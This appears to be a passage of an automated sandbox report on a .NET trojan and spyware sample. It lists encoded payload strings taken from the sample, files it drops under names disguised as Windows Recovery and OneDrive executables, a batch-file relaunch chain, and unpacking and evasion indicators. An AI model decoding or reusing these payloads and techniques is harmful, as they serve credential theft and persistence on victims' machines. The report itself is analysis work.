'H4sIAAAAAAAEADSbx3KrUBqE32W2LMhpaXIGkWFW5JwzTz/cxbjqN2ULHZ3Y3Z8l//e//5GwTf77/5f50GxYe3YeoeW5IzQA7WzRbTtumA6fXYiaELLzU42bZ2zvx6V1A2FUOjDNbFf3vgf7HWYCZ/O2iEIhH+eUT6NozktZbssI2Z4HJWMhDcwAQZfp6f6CvMBBCETBnCpCdV0gckeI3vWLIkOG4bSe/rB9nqJFNJrYGlVB5TwtLS2vc1axMQ8ILePDuu7IPfdgMppNqzJzFK5vMM5z1tYvYB1f+EXX5wDK4OWWCqSWGqdDa4ADAH0AEq7RcC8p7sIOrZqHKDkg3OvZ7thJbepNXgqK4fCi1KvhG7DzkZudJqk5CBuBF36MX+9cBalux64afYkHfHiB0uhvSbk0TQ8qIL2HIEaijJqTcgO9qBcmrNOThzftoC2cKLBIN1DThkXWUEYe0su9NWKdEIAOUpBg9HbYsPIyNRBbhb1Roxl7Vu7loqc+ZVZYU1keP6ZGY/ti1fdV3sA6UTaN9/LVz/F5/6aBmLHeRjOt8YFaVSI9zPP5qcCE/Dd4287DDbJgP8/DMVv2vIePEUHGIbVnsAC3WoBf5KHPr1/0u88+dSLq0JABTm+QWVjA+wCq68Y3DbrWmv7IpUgkOVesuTgBaYohmpiHfMcJ50zRb77mIwSBUK4BOilB4vIKAyhGQltekMKnGmzVF7K4ENqSSTuznYp/Zwkgz4tgmDoqjwxvb0qA6hyAKE1vaCmhkko21BrSznmg4XlkFI0YE6CUobMswAGiIes2yOiet2AFUqh/u+Kgdx+jKJqEtbYGv9UZTReq0HINiXqx3pew811AR2rFh52mAfQYT7FJD8pI3NtF8u3rfy6kKFnneAbRV4AKUportPQ1lK6sr1lve0xELklkOu0xcpqoY5EvRUe6YIDjYaV2XRQUlLsoSdHnG+F/pWkd57WFWXHIFnnjahwAOP4ig8UJ5E1uNMhtNB6BvNDTTg5ugwYB2jlKljBkngUGZ1qRBW5y49RPJEmrA3MkFNyma1KILeU7uwmaJBxiNHiCQedA8WZKiHbbJlKQL9oBGQHVGRSC1gSpCDhqMrSbaHKjKcKRYHNZVTrQOEIbeEiObYQ4FCpZ49uCR5mfbEn7Jbht4AvcxEWtN8fRdA2DfolalgU6C4qC5tk8GI17IHjwPI6DeFi1NN1ZWlGWO5/6QUPu93hfsCORI/6XFiuo3hwyJ/xOj/2kZcBZtGkPkxQw4WDug9gO9py1zvcDW9/+CKGb9KXTNU6oLW35ik9wc+IwLA11HQBiE5M8PPSxfDvisJaeRPHMAG7tO79l8e4JfJoUB8HUnjzQRhrCiAFlFh8KfIdlkJNZqXFMXOQg9T7rg5cb7ZvGGwKZfrojDaH44eYajsV8TOpnVlJl3pDZMw8ufXSLXvTF+fR0oYfwdBE0Q6GkZm+3RKIvSj5Tg47nOJMvvZxj37BU0jqllf5Yw/MkCtn4wfu9hXl5S+Kpt6/Oibzyia8uftI4E+ws1x0QsxNllVIvjOl3uOP2vulBuOv2runpePD2mulnuC08g9aHpm89tdZbpk/hP6VfQrXOZumJAb+J4/5pUiU7fDue/FfEwIQ9kKSfXxS+dC88NWvZdsaWbj8+vpl1DLfzgB/
                        Source: 3e88PGFfkf.exe, 8B6.csBase64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
                        Source: 3e88PGFfkf.exe, 7YK.csBase64 encoded string: '/KK1O5WjtyyXuvn2FW3iLuk1bBBLi1r2pYEhokFG0HagcBH+jVSE23w2zvV9CZig35w+CPhM9IR63uxmR364DilnEQLndHMWQ0zysQk7YAgU0sE8KU3O42YQGAw1jlS9xBgoF5jR2wUf0Gs+Q3r38o/e1GYqONxAIA8vlQTEGrlsoDT2116r9TEVr6GyP4JVst5qEdoW+AFlgNf3xLRbU7y/t5sYAp5fSWSf0bNOb553exZ6TcjgZdzHRQ/ujV628wXcXboLN/5kBBnjqVbPD47fZmOe03NQuLkfDQzYsBB8g5tYKPmAihVJcp7SDULry1qd9LXd7YNLvgCIsYSD4RuAoy43ftnU6bOuSmCe5piyrv+qmQGrbgI60XPq4eefEiiKozAqWnp2KyC8ttyVvPBzolDIYATEWYwKMpybU5qAwogKA4bzNICo0HpBTjH32xQ1NJ7P76VXqjtlHmo5BUii4kLMCYpsTCRxxuKox4wTZyzMF7qGPvA3Ji81IfdOifDPnWV4yf2+gHpbenWfnQLw3cxhI8VBI1SgCBRQkKvSDib6SH6y2+YnCg+6EL7SStg8Nqy/IsBC7tKqw3cw0CanirjWofwN8EH5eq64XDLIA2loIJKVvFEGpTKzU6ZXonVQlJbtb+pCA5CIMUXyYVZjNvZGq10O8u/6xTh0JM503YK6RMGpy1mi1T4yWB0dI4lNL9p938QIcUao5ZunYc6zJw8NzKqXeyx+28UaS9rWrza73XRpNs9WegD1tMC8HpBQw5AnWgbzThxYp2rX/BcrUiiQA2gcLZkkh2q24KTAlWjyoGRnKIn5dlnO9fq+Qi3wAAWS8nKBkJcZFi0Kx4stejicoA2fmcqpUJRgxLmkziffuo9Mi1HXSd/9XJBwupY3xH3P3NaQKVDTpYeLNHieJP0/6oooKjfIZcMSUYRu8oDHrRGYuwxcEl+tOYpClGkCs9O+LTC8Z0vdMIdY037m5R2rdsxl9WQ9/TkgvsT25URqcy+wgRsZ0aJ6UfA7', 'LMxlk2n6RHUU37RLGyQm09Bwsnbqx4nol1J72ZpqzfaPueBy3oeMMNCMKA26b7IXepsByUTrJkwVjvBOmnwIaabXy6w1gsP1WDvFv99iVxDmarnY9oUxLA6ENUM1ibKa'
                        Source: 3e88PGFfkf.exe, 52Z.csBase64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/311@0/1
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\bAJNFhyM.logJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2852:120:WilError_03
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeMutant created: \Sessions\1\BaseNamedObjects\Local\3d52a86e45d8d502a99264560f361829f86db69ae8a312d99a9e66965ef576b5
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\AppData\Local\Temp\XhPgWUdzHBJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.bat"
                        Source: 3e88PGFfkf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 3e88PGFfkf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C7TZWxIlfa.5.dr, UFlcRGS5ly.5.dr, IqUCSDMXyU.5.dr, NQdhKOaonm.5.dr, EOhiAJxKR1.5.dr, umVaz2yxFC.5.dr, D4KTDbDrvq.5.dr, ldOJQwKqg5.5.dr, 70zsYIkI0I.5.dr, vgRtlGlDtF.5.dr, 2njwmA4Bkr.5.dr, st0gdRPkox.5.dr, H2jsU3Z45j.5.dr, MMIhm3GZns.5.dr, Z4eWZbIto2.5.dr, NCYC54HwKp.5.dr, k8tUOhqXGg.5.dr, jODbsgKbPy.5.dr, 0yIswN7bbT.5.dr, Vezk39M9OK.5.dr, o17pTFSHSR.5.dr, 7DVLrQs9qI.5.dr, L45TtftLS8.5.dr, 0tt80dM9Cp.5.dr, DAx0TXNcIB.5.dr, nBJKnsAy0u.5.dr, ujdmmvWtT7.5.dr, Xb88yHbaNA.5.dr, 3uIav5zFmx.5.dr, U5A33X3VCL.5.dr, 7bpBeJEdHx.5.dr, l7xvrg5FZH.5.dr, iczakOcP94.5.dr, DSnrL5CnFk.5.dr, eSsOiwnyUm.5.dr, uFEhe2jODH.5.dr, pVszdlnSHm.5.dr, 5dJsHTYoHQ.5.dr, 2DJ3PvnTqj.5.dr, mkzLI8Wv9p.5.dr, MV09GZzAnd.5.dr, buz3btBG0P.5.dr, 1AaVNCQHBw.5.dr, atcI5wCADG.5.dr, DSHumQsotM.5.dr, 48sPQOISBj.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: 3e88PGFfkf.exeVirustotal: Detection: 65%
                        Source: 3e88PGFfkf.exeReversingLabs: Detection: 78%
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile read: C:\Users\user\Desktop\3e88PGFfkf.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\3e88PGFfkf.exe "C:\Users\user\Desktop\3e88PGFfkf.exe"
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.bat"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe "C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe"
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aWMGkikz2Q.bat" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe "C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: version.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: winmmbase.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: mmdevapi.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: ksuser.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: avrt.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: audioses.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: msacm32.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: midimap.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDirectory created: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeDirectory created: C:\Program Files\Windows Multimedia Platform\d8d7f04fab25b9Jump to behavior
                        Source: 3e88PGFfkf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 3e88PGFfkf.exeStatic file information: File size 4897280 > 1048576
                        Source: 3e88PGFfkf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 3e88PGFfkf.exe, 1a2.cs.Net Code: ghM System.Reflection.Assembly.Load(byte[])
                        Source: 3e88PGFfkf.exe, 857.cs.Net Code: _736
                        Source: 3e88PGFfkf.exeStatic PE information: real checksum: 0xdd1ba should be: 0x4bb1ba
                        Source: dllhost.exe.0.drStatic PE information: real checksum: 0xdd1ba should be: 0x4bb1ba
                        Source: psSFLznncXozWndMhTDdwutNn.exe.0.drStatic PE information: real checksum: 0xdd1ba should be: 0x4bb1ba
                        Source: WinStore.App.exe.0.drStatic PE information: real checksum: 0xdd1ba should be: 0x4bb1ba
                        Source: psSFLznncXozWndMhTDdwutNn.exe0.0.drStatic PE information: real checksum: 0xdd1ba should be: 0x4bb1ba
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeCode function: 0_2_00007FFD9B893CB9 push ebx; retf 0_2_00007FFD9B893CBA
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\vJMbuDiW.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\NWogOZDl.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\lhYdlwRP.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\mezlGwgJ.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Program Files\Windows Multimedia Platform\psSFLznncXozWndMhTDdwutNn.exeJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\bAJNFhyM.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\wMTBqZlr.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\YIOWuXMo.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\wOXBumXW.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\dllhost.exeJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Recovery\WinStore.App.exeJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\FsgregnE.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\yXpCqrRs.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\bAJNFhyM.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\NWogOZDl.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\FsgregnE.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\wOXBumXW.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeFile created: C:\Users\user\Desktop\vJMbuDiW.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\lhYdlwRP.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\YIOWuXMo.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\yXpCqrRs.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\wMTBqZlr.logJump to dropped file
                        Source: C:\Recovery\psSFLznncXozWndMhTDdwutNn.exeFile created: C:\Users\user\Desktop\mezlGwgJ.logJump to dropped file
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\3e88PGFfkf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
